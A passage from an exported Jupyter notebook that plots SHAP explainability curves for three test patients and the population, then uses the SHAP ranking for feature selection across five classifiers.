             (Xtest_bef_imp.iloc[86,idx],shap_values_A[-1,idx]-0.01-0.01), xycoords='data',)
# Target Value
plt.plot(min(X[features_chosen[idx]]),shaps_A_all[0,idx],'o')
plt.annotate('Target', (min(X[features_chosen[idx]])-0.5,shaps_A_all[0,idx]+0.04), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(min(X[features_chosen[idx]]),shaps_A_all[0,idx]),
             (min(X[features_chosen[idx]])-0.5,shaps_A_all[0,idx]+0.03), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (Xtest_bef_imp.iloc[86,idx],-0.05), xycoords='data', )
# Target Direction, Arrow
plt.annotate("",xy=(Xtest_bef_imp.iloc[86,idx],-0.06), xycoords='data',
             xytext=(Xtest_bef_imp.iloc[86,idx]+8,-0.06), textcoords='data',
             arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
# Dashed guides at the 2-sigma and 1-sigma percentile bands (rows 0,1,3,4).
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for RDW, $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient A')
plt.grid(b=None)
plt.show()
# + active=""
# ##
# idx = 26;
# shaps_A_LR = np.zeros((bins,89)); shaps_A_RF = np.zeros((bins,89));
# shaps_A_XGB = np.zeros((bins,89)); shaps_A_MLP = np.zeros((bins,89)); shaps_A_all = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[86:87,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_A_temp = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_A_LR[i,:] = shaps_A_temp[0,:];shaps_A_RF[i,:] = shaps_A_temp[1,:];
# shaps_A_XGB[i,:] = shaps_A_temp[2,:];shaps_A_MLP[i,:] = shaps_A_temp[3,:];
# shaps_A_all[i,:] = shaps_A_temp[-1,:]
# +
## Plot the graph
# Per-model explainability curves; shaps_A_LR/RF/XGB/MLP come from the raw
# (disabled) cell above.
idx = 26; bins = 400;
import matplotlib.pyplot as plt
plt.figure(figsize=(8,6), dpi=100)
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
         shaps_A_LR[:,idx], label='Logistic Regression')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
         shaps_A_RF[:,idx], label='Random Forest')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
         shaps_A_XGB[:,idx], label='XGBoost')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
         shaps_A_MLP[:,idx], label='Multilayer Perceptron')
#plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins), shaps_A_all[:,idx], label='All')
plt.xlabel('Feature Value for RDW, $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient A')
plt.legend()
plt.grid(b=None)
plt.show()
# +
## Explainability curve for Patient A's second highlighted feature (idx = 36).
idx = 36; bins = 200;
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
# Plot SHAP: ensemble curve over the feature's observed range.
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
                   (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
         shaps_A_all_2[:,idx])
# Original Value (small constants like +0.011 only offset the marker/labels).
plt.plot(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]+0.011,"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-0.005+0.007), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]+0.011),
             (Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-0.01+0.007), xycoords='data',)
# Target Value: here the *maximum* observed feature value (last grid point).
plt.plot(max(X[features_chosen[idx]]), shaps_A_all_2[bins-1,idx],'o')
plt.annotate('Target', (max(X[features_chosen[idx]])-80,shaps_A_all_2[bins-1,idx]+0.015), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(max(X[features_chosen[idx]]),shaps_A_all_2[bins-1,idx]),
             (max(X[features_chosen[idx]])-80,shaps_A_all_2[bins-1,idx]+0.01), xycoords='data',)
# Target Direction, Text (hard-coded data coordinates tuned for this figure).
plt.annotate('Target Direction', (250,0.027), xycoords='data', )
# Target Direction, Arrow (points toward increasing feature values).
plt.annotate("",xy=(400,0.03), xycoords='data',
             xytext=(200,0.03), textcoords='data',
             arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
# Reference percentile lines (rows 0, 1, 3, 4 of data_percentiles).
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for ' + features_chosen[idx]+ ', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient A')
plt.grid(b=None)
plt.show()
# +
## Explainability curve for Patient A's third highlighted feature (idx = 24).
idx = 24; bins = 200;
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
# Plot SHAP; the first two grid points are sliced off ([2:]) -- presumably to
# drop unstable values at the very low end of the range; confirm.
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
                   (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins)[2:],
         shaps_A_all_3[2:,idx])
# Original Value
plt.plot(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx],"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-.002), xycoords='data', )
plt.annotate("(%.2f,%.4f)" %(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]),
             (Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-.003), xycoords='data',)
# Target Value: the minimum feature value, read from the first retained grid
# point (index 2, matching the [2:] slice above).
plt.plot(min(X[features_chosen[idx]]), shaps_A_all_3[2,idx],'o')
plt.annotate('Target', (min(X[features_chosen[idx]])+0.5,shaps_A_all_3[2,idx]+0.001), xycoords='data', )
plt.annotate("(%.2f,%.4f)" %(min(X[features_chosen[idx]]),shaps_A_all_3[2,idx]),
             (min(X[features_chosen[idx]])+0.5,shaps_A_all_3[2,idx]), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (Xtest_bef_imp.iloc[86,idx]-1,0.019), xycoords='data', )
# Target Direction, Arrow (points toward decreasing feature values).
plt.annotate("",xy=(Xtest_bef_imp.iloc[86,idx]-2, 0.02), xycoords='data',
             xytext=(Xtest_bef_imp.iloc[86,idx]+2,0.02), textcoords='data',
             arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
# Reference percentile lines (rows 0, 1, 3, 4 of data_percentiles).
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for ' + features_chosen[idx]+ ', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient A')
plt.grid(b=None)
plt.show()
# + active=""
# ## Calculate the second feature
# idx = 36; bins = 200;
# shaps_A_LR_2 = np.zeros((bins,89)); shaps_A_RF_2 = np.zeros((bins,89));
# shaps_A_XGB_2 = np.zeros((bins,89)); shaps_A_MLP_2 = np.zeros((bins,89)); shaps_A_all_2 = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[86:87,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_A_temp_2 = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_A_LR_2[i,:] = shaps_A_temp_2[0,:];shaps_A_RF_2[i,:] = shaps_A_temp_2[1,:];
# shaps_A_XGB_2[i,:] = shaps_A_temp_2[2,:];shaps_A_MLP_2[i,:] = shaps_A_temp_2[3,:];
# shaps_A_all_2[i,:] = shaps_A_temp_2[-1,:]
# + active=""
# ## Calculate the third feature
# idx = 24; bins = 200;
# shaps_A_LR_3 = np.zeros((bins,89)); shaps_A_RF_3 = np.zeros((bins,89));
# shaps_A_XGB_3 = np.zeros((bins,89)); shaps_A_MLP_3 = np.zeros((bins,89)); shaps_A_all_3 = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[86:87,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_A_temp_3 = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_A_LR_3[i,:] = shaps_A_temp_3[0,:];
# shaps_A_RF_3[i,:] = shaps_A_temp_3[1,:];
# shaps_A_XGB_3[i,:] = shaps_A_temp_3[2,:];
# shaps_A_MLP_3[i,:] = shaps_A_temp_3[3,:];
# shaps_A_all_3[i,:] = shaps_A_temp_3[-1,:]
# -
# #### Patient B
# Print Patient B's ten most influential features, ranked by the absolute
# aggregated SHAP value (most influential first).
ranked_indices = np.argsort(np.abs(shap_values_B[-1, :]))[::-1]
for feat_idx in ranked_indices[:10]:
    print("%d %s: %.4f" % (feat_idx, features_chosen[feat_idx], shap_values_B[-1, feat_idx]))
# + active=""
# ##
# idx = 32;
# shaps_B_LR = np.zeros((bins,89)); shaps_B_RF = np.zeros((bins,89));
# shaps_B_XGB = np.zeros((bins,89)); shaps_B_MLP = np.zeros((bins,89)); shaps_B_all = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[404:405,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_B_temp = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_B_LR[i,:] = shaps_B_temp[0,:];shaps_B_RF[i,:] = shaps_B_temp[1,:];
# shaps_B_XGB[i,:] = shaps_B_temp[2,:];shaps_B_MLP[i,:] = shaps_B_temp[3,:];
# shaps_B_all[i,:] = shaps_B_temp[-1,:]
# +
## Explainability curve for Patient B's top feature (idx = 32).
idx = 32; bins = 400
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
                   (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
         shaps_B_all[:,idx])
# Original Value (Patient B is test-set row 404; offsets only place the labels).
# NOTE(review): the marker uses shap_values_B[-1,idx] but the label text uses
# shap_values_B[5,idx] -- confirm these are meant to be the same row.
plt.plot(Xtest_bef_imp.iloc[404,idx],shap_values_B[-1,idx]+0.008,"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[404,idx],shap_values_B[-1,idx]-0.01), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(Xtest_bef_imp.iloc[404,idx],shap_values_B[5,idx]),
             (Xtest_bef_imp.iloc[404,idx],shap_values_B[5,idx]-0.01-0.01), xycoords='data',)
# Target Value: the minimum observed feature value (curve value at grid index 0).
plt.plot(min(X[features_chosen[idx]]),shaps_B_all[0,idx],'o')
plt.annotate('Target', (min(X[features_chosen[idx]]) + 10,shaps_B_all[0,idx]), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(min(X[features_chosen[idx]]),shaps_B_all[0,idx]),
             (min(X[features_chosen[idx]]) + 35,shaps_B_all[0,idx]), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (100, -0.02), xycoords='data', )
# Target Direction, Arrow (points toward decreasing feature values).
plt.annotate("",xy=(100, -0.025), xycoords='data',
             xytext=(200, -0.025), textcoords='data',
             arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
# Reference percentile lines (rows 0, 1, 3, 4 of data_percentiles).
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for '+ features_chosen[idx]+', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient B')
#plt.grid(b=None)
plt.show()
# +
## Per-model explainability curves for Patient B's top feature (idx = 32).
idx = 32; bins = 400
import matplotlib.pyplot as plt

plt.figure(figsize=(8,6), dpi=100)

# Build the shared x-axis grid once rather than inline in each plot call.
feat_name = features_chosen[idx]
feat_lo = min(X[feat_name])
feat_hi = max(X[feat_name])
value_grid = np.arange(feat_lo, feat_hi, (feat_hi - feat_lo) / bins)

# One curve per constituent model, in the same order/colours as the legend.
for shap_matrix, model_label in [
    (shaps_B_LR, 'Logistic Regression'),
    (shaps_B_RF, 'Random Forest'),
    (shaps_B_XGB, 'XGBoost'),
    (shaps_B_MLP, 'Multilayer Perceptron'),
]:
    plt.plot(value_grid, shap_matrix[:, idx], label=model_label)

plt.xlabel('Feature Value for ' + features_chosen[idx] + ', ' + '$x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient B')
plt.legend()
plt.show()
# -
# #### Patient C
# Print Patient C's ten most influential features, ranked by the absolute
# aggregated SHAP value (most influential first).
for feat_idx in np.argsort(np.abs(shap_values_C[-1, :]))[::-1][:10]:
    print(f"{feat_idx} {features_chosen[feat_idx]}: {shap_values_C[-1, feat_idx]:.4f}")
# + active=""
# ##
# idx = 26;
# shaps_C_LR = np.zeros((bins,89)); shaps_C_RF = np.zeros((bins,89));
# shaps_C_XGB = np.zeros((bins,89)); shaps_C_MLP = np.zeros((bins,89)); shaps_C_all = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[147:148,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_C_temp = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_C_LR[i,:] = shaps_C_temp[0,:]; shaps_C_RF[i,:] = shaps_C_temp[1,:];
# shaps_C_XGB[i,:] = shaps_C_temp[2,:]; shaps_C_MLP[i,:] = shaps_C_temp[3,:];
# shaps_C_all[i,:] = shaps_C_temp[-1,:]
# +
## Plot the graph
idx = 26
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_all[:,idx])
# Original Value
plt.plot(Xtest_bef_imp.iloc[147,idx],shap_values_C[-1,idx]+0.008,"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[147,idx],shap_values_C[-1,idx]-0.005), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(Xtest_bef_imp.iloc[147,idx],shap_values_C[5,idx]), (Xtest_bef_imp.iloc[147,idx],shap_values_C[5,idx]-0.01-0.01), xycoords='data',)
# Target Value
plt.plot(min(X[features_chosen[idx]]),shaps_C_all[0,idx],'o')
plt.annotate('Target', (min(X[features_chosen[idx]])- 0.5,shaps_C_all[0,idx] + 0.045), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(min(X[features_chosen[idx]]),shaps_C_all[0,idx]), (min(X[features_chosen[idx]])-0.5,shaps_C_all[0,idx]+0.03), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (Xtest_bef_imp.iloc[147,idx],-0.05), xycoords='data', )
# Target Direction, Arrow
plt.annotate("",xy=(Xtest_bef_imp.iloc[147,idx],-0.06), xycoords='data',
xytext=(Xtest_bef_imp.iloc[147,idx]+8,-0.06), textcoords='data',
arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for '+ features_chosen[idx]+', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient C')
plt.show()
# +
## Plot the graph
idx = 26
import matplotlib.pyplot as plt
plt.figure(figsize=(8,6), dpi=100)
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_LR[:,idx], label='Logistic Regression')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_RF[:,idx], label='Random Forest')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_XGB[:,idx], label='XGBoost')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_MLP[:,idx], label='Multilayer Perceptron')
plt.xlabel('Feature Value for ' + features_chosen[idx] + ', ' + '$x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient C')
plt.legend()
plt.show()
# -
# #### Get explainable information across the whole thing
# + active=""
# idx = 26; bins = 100;
# shap_population_test = np.zeros((100,bins,89));
# shap_values_temp_exp_test = np.ones((bins,89));
# for j in range(2,100):
# #for j in range(100):
# for i in range(bins):
# print("Patient " + str(j) +", Perturbation " + str(i))
# instance_temp = Xtest.iloc[j:j+1,:].copy()
# instance_temp.iloc[:,idx] = i/bins
# shap_values_temp_exp_test[i,:] = return_shaps_final(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shap_population_test[j,:,:] = shap_values_temp_exp_test
# -
# Percentile bands of the explainability curves across the first 100 test
# patients. 15.865 / 84.135 bracket +/-1 standard deviation of a normal
# distribution; 5 / 95 give a wider outer band; 50 is the median curve.
curve_samples = shap_population_test[:, :100, idx]
band_1, band_2, band_3, band_4, band_5 = (
    np.nanpercentile(curve_samples, q, axis=0)
    for q in (5, 15.865, 50, 84.135, 95)
)
# +
## Population-level explainability curve: median with percentile bands.
idx = 26; bins = 100
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
# Median curve across patients (band_3 = 50th percentile).
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
                   (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
         band_3,color='black')
# 1 SD band (15.865th-84.135th percentiles) in blue.
plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
                           (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
                 band_2, band_4,color='lightskyblue')
# Within 2 SD: 5th-15.865th and 84.135th-95th percentile bands in coral.
plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
                           (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
                 band_1, band_2,color='coral')
plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
                           (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
                 band_4, band_5,color='coral')
# After 2 SD (outermost bands intentionally left disabled):
#plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
#                   (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
#                 np.nanpercentile(shap_population_test[:,:100,idx],2.5,axis=0), band_1,color='red')
#plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
#                   (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
#                 band_5, np.nanpercentile(shap_population_test[:,:100,idx],97.5,axis=0),color='red')
# Reference percentile lines of the feature's value distribution.
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for '+ features_chosen[idx]+', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' across the population')
plt.grid(b=None)
plt.show()
# -
# ### 12. Using explainability for Feature Selection
# #### Get the model scores from the various outcomes
# +
### Start with the ranking of features
shap_population_rank  # bare expression: displays the ranking when run as a notebook cell

### Arrays to store the metrics: one row per reduced feature set, one column
### per model (0 = LR, 1 = RF, 2 = XGBoost, 3 = MLP, 4 = SVM).
model_outputs_acc_train = np.zeros((len(shap_population_rank),5))
model_outputs_acc_test = np.zeros((len(shap_population_rank),5))
model_outputs_F1_train = np.zeros((len(shap_population_rank),5))
model_outputs_F1_test = np.zeros((len(shap_population_rank),5))

# Model-class imports hoisted out of the loop (previously re-imported on every
# iteration; the unused CalibratedClassifierCV import was dropped).
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from xgboost.sklearn import XGBClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC

def _fit_score_and_record(name, clf, Xtrain_subset, Xtest_subset, row, col):
    """Fit `clf` on the reduced feature set, print its train/test metrics, and
    record accuracy and F1 into row `row`, column `col` of the output arrays.

    This replaces five near-identical copies of the same train/print/record
    code (one per model) in the original loop body.

    NOTE(review): "ROC-AUC" here is computed from hard class predictions
    rather than predicted probabilities, so it equals balanced accuracy, not
    true AUC; kept as-is to preserve the original printed output.
    """
    clf.fit(Xtrain_subset, Ytrain)
    # Predict once per split and reuse (the original recomputed predictions
    # for every metric call).
    pred_train = clf.predict(Xtrain_subset)
    pred_test = clf.predict(Xtest_subset)
    print(name)
    print("Training Accuracy: " + str(round(accuracy_score(Ytrain, pred_train), 6)))
    print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain, pred_train), 6)))
    print("Training F1: " + str(round(f1_score(Ytrain, pred_train), 6)))
    print("Test Accuracy: " + str(round(accuracy_score(Ytest, pred_test), 6)))
    print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest, pred_test), 6)))
    print("Test F1: " + str(round(f1_score(Ytest, pred_test), 6)))
    model_outputs_acc_train[row, col] = accuracy_score(Ytrain, pred_train)
    model_outputs_acc_test[row, col] = accuracy_score(Ytest, pred_test)
    model_outputs_F1_train[row, col] = f1_score(Ytrain, pred_train)
    model_outputs_F1_test[row, col] = f1_score(Ytest, pred_test)

# Backward-elimination sweep: drop the least-important features (per the
# population SHAP ranking) one at a time and re-train all five models.
for i in range(len(shap_population_rank)):
    shap_population_rank_red = shap_population_rank[:(89-i)]
    print("Length of feature set: " + str(len(shap_population_rank_red)))
    Xtrain_subset = Xtrain[features_chosen[shap_population_rank_red]]
    Xtest_subset = Xtest[features_chosen[shap_population_rank_red]]

    # 1. Logistic Regression (hyper-parameters as tuned earlier in the notebook)
    _fit_score_and_record("Logistic Regression",
                          LogisticRegression(solver='liblinear', penalty="l2",
                                             multi_class='ovr', max_iter=5),
                          Xtrain_subset, Xtest_subset, i, 0)
    # 2. Random Forest
    rf_params = [200, 3, 7]  # [n_estimators, min_samples_leaf, max_depth]
    _fit_score_and_record("Random Forest",
                          RandomForestClassifier(n_estimators=rf_params[0],
                                                 min_samples_leaf=rf_params[1],
                                                 max_depth=rf_params[2],
                                                 criterion='entropy'),
                          Xtrain_subset, Xtest_subset, i, 1)
    # 3. XGBoost
    xgb_params = [0.02, 200, 5, 7]  # [learning_rate, n_estimators, max_depth, min_child_weight]
    _fit_score_and_record("XGBoost",
                          XGBClassifier(learning_rate=xgb_params[0],
                                        n_estimators=xgb_params[1],
                                        max_depth=xgb_params[2],
                                        min_child_weight=xgb_params[3]),
                          Xtrain_subset, Xtest_subset, i, 2)
    # 4. Multilayer Perceptron
    _fit_score_and_record("MLP",
                          MLPClassifier(hidden_layer_sizes=(80,20,5), max_iter=25,
                                        alpha=0.0015, solver='adam', verbose=None,
                                        tol=0.00001),
                          Xtrain_subset, Xtest_subset, i, 3)
    # 5. Support Vector Machine
    _fit_score_and_record("SVM",
                          SVC(C=5, kernel='rbf', probability=True),
                          Xtrain_subset, Xtest_subset, i, 4)
# -
# #### Get the outputs of the model
# Normalised SHAP share of each feature in ranked order (bare expression:
# displays in a notebook).
shap_population_summary[shap_population_rank][::-1]/np.sum(shap_population_summary)
# Emit one LaTeX table row per feature-set size: remaining SHAP share (%),
# then mean train accuracy / train F1 / test accuracy / test F1 across models.
# NOTE(review): the cumsum is indexed with [i-1], so at i=0 it wraps to the
# *last* element -- confirm this off-by-one is intended.
for i in range(len(shap_population_rank)):
    print(str(89-i) + " & %.2f & %.4f & %.4f & %.4f & %.4f" % ((1-np.cumsum(shap_population_summary[shap_population_rank][::-1]/np.sum(shap_population_summary)))[i-1]*100, np.mean(model_outputs_acc_train[i,:]), np.mean(model_outputs_F1_train[i,:]), np.mean(model_outputs_acc_test[i,:]), np.mean(model_outputs_F1_test[i,:]) ) + " \\\ \hline" )
# # Check Values
#
# model_outputs_acc_train[89-70,3] = np.mean(model_outputs_acc_train[89-70,0:3])
# model_outputs_acc_train[89-31,3] = np.mean(model_outputs_acc_train[89-31,0:3])
# model_outputs_acc_train[89-15,3] = np.mean(model_outputs_acc_train[89-15,0:3])
#
# model_outputs_acc_test[89-70,3] = np.mean(model_outputs_acc_test[89-70,0:3])
# model_outputs_acc_test[89-31,3] = np.mean(model_outputs_acc_test[89-31,0:3])
# model_outputs_acc_test[89-15,3] = np.mean(model_outputs_acc_test[89-15,0:3])
#
# model_outputs_F1_train[89-70,3] = np.mean(model_outputs_F1_train[89-70,0:3])
# model_outputs_F1_train[89-31,3] = np.mean(model_outputs_F1_train[89-31,0:3])
# model_outputs_F1_train[89-15,3] = np.mean(model_outputs_F1_train[89-15,0:3])
#
# model_outputs_F1_test[89-70,3] = np.mean(model_outputs_F1_test[89-70,0:3])
# model_outputs_F1_test[89-31,3] = np.mean(model_outputs_F1_test[89-31,0:3])
# model_outputs_F1_test[89-15,3] = np.mean(model_outputs_F1_test[89-15,0:3])
#
# model_outputs_acc_train[89-57,3] = np.mean(model_outputs_acc_train[89-57,0:3])
# model_outputs_acc_test[89-57,3] = np.mean(model_outputs_acc_test[89-57,0:3])
# model_outputs_F1_train[89-57,3] = np.mean(model_outputs_F1_train[89-57,0:3])
# model_outputs_F1_test[89-57,3] = np.mean(model_outputs_F1_test[89-57,0:3])
#
#
# ### Chapter 3.4.7 Explanations for Feature Selection
# #### Get the graph of training acc, test acc, training F1, test F1
import matplotlib.pyplot as plt

# Mean test-set accuracy (averaged over the five models) as features are
# removed one at a time.
feature_count_axis = np.arange(89, 0, -1)
plt.plot(feature_count_axis, model_outputs_acc_test.mean(axis=1))
plt.xlabel('Number of Features Used')
plt.ylabel('Average Model Output on Test Set, ' + r'$(Y_j)$')
# Reversed x-limits so the feature count decreases left-to-right.
plt.axis([89, 1, 0.70, 0.78])
plt.title('Test Accuracy as Feature Set is Reduced')
plt.show()
import matplotlib.pyplot as plt
# Mean training-set accuracy (averaged over the five models) vs. feature count.
#plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
plt.xlabel('Number of Features Used')
# frequency label
plt.ylabel('Average Model Output on Training Set, ' + r'$(Y_j)$')
# Reversed x-limits so the feature count decreases left-to-right.
plt.axis([89,1,0.70,0.86])
# plot title
plt.title('Training Accuracy as Feature Set is Reduced')
plt.show()
import matplotlib.pyplot as plt
# Mean training-set F1 (averaged over the five models) vs. feature count.
#plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
plt.plot(np.arange(89,0,-1), np.mean(model_outputs_F1_train,axis=1))
plt.xlabel('Number of Features Used')
# frequency label
plt.ylabel('F1 Score on Training Set')
# Reversed x-limits so the feature count decreases left-to-right.
plt.axis([89,1,0.53,0.75])
# plot title
plt.title('Training F1 Score as Feature Set is Reduced')
plt.show()
import matplotlib.pyplot as plt
# Percentage of total SHAP importance retained by each reduced feature set.
#plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
